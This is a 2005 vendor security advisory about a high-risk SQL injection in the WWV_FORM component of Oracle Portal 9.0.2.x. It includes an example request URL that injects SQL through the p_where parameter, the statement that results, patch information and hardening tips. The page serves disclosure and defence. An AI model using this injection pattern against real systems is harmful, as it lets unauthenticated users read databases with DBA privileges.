Red-Database-Security GmbH is specialized in Oracle Security

Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search

Oracle Exploit SQL Injection in WWV_FORM
Search Red-Database-Security
Oracle Exploit SQL Injection in WWV_FORM
Name SQL Injection in WWV_FORM in Internet Application Server 9i
Systems Affected Oracle Portal Release 2 (9.0.2.x)
Severity High Risk
Category SQL Injection
Vendor URL http://www.oracle.com/
Credit Metalink Bug:2846638
Exploit http://metalink.oracle.com
Date 02 May 2005 (V 1.00)

Details

By modifying a portal URL containing the WWV_FORM string it is possible that an unauthenticated user can execute any select statement with DBA privileges.


Solution
Apply the patches from alert 61 or later.


Example
st?p_fieldname=p_attributes&p_fieldname=p_attributenames&p_fieldname=p_attributedatatypes
&p_fieldname=p_attributesiteid&p_lov=SEARCHATTRLOV&p_element_index=0&p_formname=SEARCH54_PAGESEARCH_899010056
&p_where=criteria%20=%201%20order=1&p_filter=%25

The following SQL statement will be executed by Oracle Portal:

select title,name,data_type,siteid from wwsbr_attribute$ a Where criteria = 1 Order by 1




Patch Information
Apply patches from Alert 61 or later.




© 2005 by Red-Database-Security GmbH - last update 02-nov-2005

Hardening Oracle Application Server

  • Change Default Password in the Infrastructure Database
  • Protect the TNS Listener
  • Remove Demo Applications / Pages
  • Disable Reports Diagnosis Pages
  • Disable Forms Query/Where
  • Stop unneeded Components